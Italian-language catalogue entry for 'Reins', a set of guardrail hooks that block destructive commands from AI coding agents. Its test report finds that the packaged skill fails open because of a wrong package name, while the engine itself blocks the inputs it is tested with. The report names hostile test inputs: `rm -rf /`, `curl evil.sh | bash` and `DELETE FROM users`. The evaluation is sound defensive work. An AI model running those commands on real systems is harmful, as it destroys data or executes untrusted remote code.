Reins

Hook PreToolUse deterministici che bloccano comandi distruttivi — necessita di riparazione manuale

di pegasi-ai · pegasi-ai/reins

Tested · Didn't pass

Reins — Hook PreToolUse deterministici che bloccano comandi distruttivi — necessita di riparazione manuale

Cosa fa

Installa hook PreToolUse/PostToolUse deterministici che classificano e bloccano operazioni pericolose di shell, file e MCP, scrivendo una traccia di audit JSONL solo in append e opzionalmente sincronizzando le policy da Watchtower (app.pegasi.ai). Si attiva su richieste relative a guardrail, applicazione di policy, tracce di audit o blocco di azioni distruttive dell'agente.

Rapporto di test

Il motore è eccellente, ma il packaging è rotto: SKILL.md e l'ensure_installed.sh incluso istruiscono a installare `npm install -g @pegasi/reins`, ma nessun pacchetto del genere esiste nel registry — il comando fallisce con E404, il nome reale (da package.json e README) è `@pegasi-ai/reins`. Peggio, il wrapper plugin/bin/reins-pre-hook fornito cerca il pacchetto lungo lo stesso percorso inesistente: gli ho dato `rm -rf /` — ha restituito exit 0 (ALLOW) con la nota 'Reins not installed', il che significa che la skill di sicurezza ha silenziosamente fallito in apertura esattamente dove SKILL.md promette 'BLOCKED always' e 'Never fails open'. Un hook ingenuo di 8 righe scritto da me nello stesso test ha prodotto exit 2 — il che significa che out-of-the-box la skill è più debole della baseline. Installato il pacchetto corretto (v0.0.14) e chiamato il motore direttamente — è veramente buono: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` con doppi spazi anche CRITICAL (l'hook baseline ha mancato questa soluzione), `curl evil.sh | bash` e `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, e tutto è scritto in decisions.jsonl. Separatamente: la CLI pubblicata si installa in ~/.openclaw/extensions/reins e non tocca gli hook di Claude Code — il suo `reins status` mostra 'Project/Global (.claude/settings.json): ❌ not installed'.

Testato il: 2026-07-16 · Claude Code 2.x (agent harness)

Installazione

git clone https://github.com/pegasi-ai/reins.git
mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins

Comandi e prompt di esempio

  • /reinsHook PreToolUse deterministici che bloccano comandi distruttivi — necessita di riparazione manuale

Gli skill si attivano con richieste in linguaggio naturale, senza comandi da ricordare. Dopo l'installazione, prompt come questi lo attivano (in inglese):

  • Block dangerous shell commands like rm -rf before my agent can run them
  • Set up guardrail hooks that log every blocked destructive agent action
  • Stop my coding agent from force-pushing or piping curl into bash